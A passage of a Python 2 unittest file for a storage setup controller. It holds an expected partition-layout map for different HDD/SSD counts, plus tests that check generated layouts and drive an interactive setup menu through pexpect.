'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'13-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'13-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'1-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-1': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'8-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-3': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-2': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'1-5': {'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'1-4': {'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'1-7': {'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}},
'8-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'8-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'8-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'5-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'5-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'5-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'5-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'5-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'3-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'3-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'3-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'3-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'3-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'11-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'2-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'2-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'2-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'2-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}}}
hdd_defaults = {'boot_device': False, 'model': 'Virtual_disk', 'size': 10000000000.0, 'software_raid': False,
'type': 'disk'}
ssd_defaults = {'boot_device': False, 'model': 'Virtual_disk', 'size': 2000000000.0, 'software_raid': False,
'type': 'ssd'}
sata_map = ['sda', 'sdb', 'sdc', 'sdd', 'sde', 'sdf', 'sdg', 'sdh', 'sdi', 'sdj', 'sdk', 'sdl', 'sdm']
ssd_map = ['sdn', 'sdo', 'sdp', 'sdq', 'sdr', 'sds', 'sdt', 'sdu', 'sdv', 'sdw', 'sdx', 'sdy', 'sdz']
DEBUG = False
@classmethod
def setUpClass(cls):
"""
Sets up the unittest, mocking a certain set of 3rd party libraries and extensions.
This makes sure the unittests can be executed without those libraries installed
"""
global client
global sc
client = SSHClient.load('127.0.0.1', 'rooter')
sc = SetupController()
@classmethod
def setUp(cls):
"""
(Re)Sets the stores on every test
"""
pass
@classmethod
def tearDownClass(cls):
"""
Clean up the unittest
"""
pass
@staticmethod
def get_disk_config(hdds, ssds):
disk_config = dict()
for hdd in xrange(0, hdds):
disk_config[PartitionLayout.sata_map[hdd]] = PartitionLayout.hdd_defaults
for ssd in xrange(0, ssds):
disk_config[PartitionLayout.ssd_map[ssd]] = PartitionLayout.ssd_defaults
return disk_config
@staticmethod
def show_layout(proposed, disks):
device_size_map = dict()
for key, values in disks.iteritems():
device_size_map['/dev/' + key] = values['size']
keys = proposed.keys()
keys.sort()
key_map = list()
for mp in keys:
sub_keys = proposed[mp].keys()
sub_keys.sort()
mp_values = ''
if not proposed[mp]['device'] or proposed[mp]['device'] in ['DIR_ONLY']:
mp_values = ' {0} : {1:20}'.format('device', 'DIR_ONLY')
print "{0:20} : {1}".format(mp, mp_values)
key_map.append(mp)
continue
for sub_key in sub_keys:
value = str(proposed[mp][sub_key])
if sub_key == 'device' and value and value != 'DIR_ONLY':
size = device_size_map[value]
size_in_gb = int(size / 1000.0 / 1000.0 / 1000.0)
value = value + ' ({0} GB)'.format(size_in_gb)
if sub_key in ['device']:
mp_values = mp_values + ' {0} : {1:20}'.format(sub_key, value)
elif sub_key in ['label']:
mp_values = mp_values + ' {0} : {1:10}'.format(sub_key, value)
else:
mp_values = mp_values + ' {0} : {1:5}'.format(sub_key, value)
print "{0:20} : {1}".format(mp, mp_values)
key_map.append(mp)
def validate(self, layout, nr_of_hdds, nr_of_ssds):
# key = nr_of_hdds + '-' + nr_of_ssds
# value = (True|False, percentage)
key = str(nr_of_hdds) + '-' + str(nr_of_ssds)
actual_layout = eval(layout).values()[0]
expected_layout = self.full_map[key]
if not assert_equal(actual_layout, expected_layout):
return True
else:
if self.DEBUG:
print 'Actual layout: {0}'.format(actual_layout)
print 'Expected layout: {0}'.format(expected_layout)
print diff(actual_layout, expected_layout)
return False
def test_partition_layout_generation(self):
full_matrix = dict()
valid = True
for nr_of_hdds in xrange(0, 3):
for nr_of_ssds in xrange(0, 3):
disk_config = self.get_disk_config(nr_of_hdds, nr_of_ssds)
layout, skipped = sc._generate_default_partition_layout(disk_config)
if self.DEBUG:
print "Disk config: {0} hdd(s) - {1} ssd(s)".format(nr_of_hdds, nr_of_ssds)
print "Proposed disk layout"
self.show_layout(layout, disk_config)
print layout
matrix = '{' + "'{0}-{1}':".format(nr_of_hdds, nr_of_ssds) + '{'
keys = layout.keys()
keys.sort()
print
for key in keys:
matrix += "'{0}':".format(key) + '{'
dir_only = layout[key]['device'] == 'DIR_ONLY'
matrix += "'DIR_ONLY':{0},'sip':'{1}',".format(dir_only,
layout[key]['percentage'] if not dir_only else 'NA')
matrix += "},"
matrix += "},}"
if self.DEBUG:
full_matrix.update(eval(matrix))
if not self.validate(matrix, nr_of_hdds, nr_of_ssds):
valid = False
if self.DEBUG:
print full_matrix
self.assertTrue(valid, 'At least one generated config failed!')
def test_interactive_menu(self):
# Use a known config - and process expected menu structure
def get_formated_lines(dl):
fl = {}
for k, v in dl.items():
fl[k] = r"{0}\s*:\s*device\s*:\s*{1}.*label\s*:\s*{2}\s*percentage\s*:\s*{3}".format(k, v['device'], v['label'], v['percentage'])
return fl
def check_partition_layout_table(formated_lines):
idxs = []
for _ in range(len(formated_lines)):
idxs.append(child.expect(formated_lines))
assert len(set(idxs)) == len(formated_lines), "Proposed partition layout did not contain all expected lines."
def pick_option(child, opt_name, fail_if_not_found = True):
opt = [l for l in child.buffer.splitlines() if opt_name in l]
assert opt or not fail_if_not_found, "Option {0} not found\n{1}".format(opt_name, child.before)
if opt:
opt = opt[0].split(":")[0].strip()
child.sendline(opt)
return bool(opt)
disk_layout = ({'/mnt/bfs': {'device': '/dev/sdd', 'label': 'backendfs', 'percentage': 80},
'/mnt/cache1': {'device': '/dev/sdb', 'label': 'cache1', 'percentage': 50},
'/mnt/db': {'device': '/dev/sdb', 'label': 'db', 'percentage': 25},
'/mnt/md': {'device': '/dev/sdb', 'label': 'mdpath', 'percentage': 25},
'/var/tmp': {'device': '/dev/sdd', 'label': 'tempfs', 'percentage': 21}},
set(['sda', 'sdc']))
child = pexpect.spawn("ovs")
child.timeout = 300
child.logfile = sys.stdout
child.expect(":")
child.sendline("from ovs.lib.setup import SetupController")
child.sendline("from ovs.extensions.generic.sshclient import SSHClient")
child.expect(":")
child.sendline("client = SSHClient.load('127.0.0.1', 'rooter')")
child.expect(":")
child.sendline("sc = SetupController()")
child.expect(":")
child.sendline("disk_layout = " + str(disk_layout))
child.expect(":")
child.sendline("sc.apply_flexible_disk_layout(client, False, disk_layout[0])")
child.expect("Proposed partition layout:")
formated_lines = get_formated_lines(disk_layout[0])
check_partition_layout_table(formated_lines.values())
child.expect("Enter number or name; return for next page")
#0: Add
child.sendline("0")
new_mountpoint = {'/mnt/cache2': {'device' : '/dev/sdc',
'label' : 'cache2',
'percentage' : '50'}}
child.expect("Enter mountpoint to add")
child.sendline(new_mountpoint.keys()[0])
check_partition_layout_table(formated_lines.values() + [new_mountpoint.keys()[0] + r"\s*:\s*device\s*:\s*DIR_ONLY"])
#2: Update
child.expect("Enter number or name; return for next page")
child.sendline("2")
child.expect("Choose mountpoint to update:")
pick_option(child, new_mountpoint.keys()[0])
